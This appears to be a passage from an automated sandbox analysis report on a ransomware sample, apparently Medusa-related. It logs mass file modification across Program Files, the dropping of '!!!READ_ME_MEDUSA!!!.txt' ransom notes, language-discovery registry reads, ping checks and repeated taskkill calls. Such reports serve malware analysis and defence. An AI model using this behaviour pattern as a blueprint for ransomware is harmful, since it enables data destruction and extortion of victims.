File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-64_contrast-black.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\WideTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Content C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\kok.pak C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\webviewCore.min.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-256_altform-unplated_contrast-black_devicefamily-colorfulunplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72_altform-unplated_contrast-high.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-20_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\LICENSE.DATA C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\RunningLate.scale-80.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\iheart-radio.scale-200.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.XML C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Eye.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\he-il\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\th-TH\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-36.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_et.json C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-96_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwcapitalized.dotx C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-32_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\2.rsrc C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.INF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Microsoft Office\Updates\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
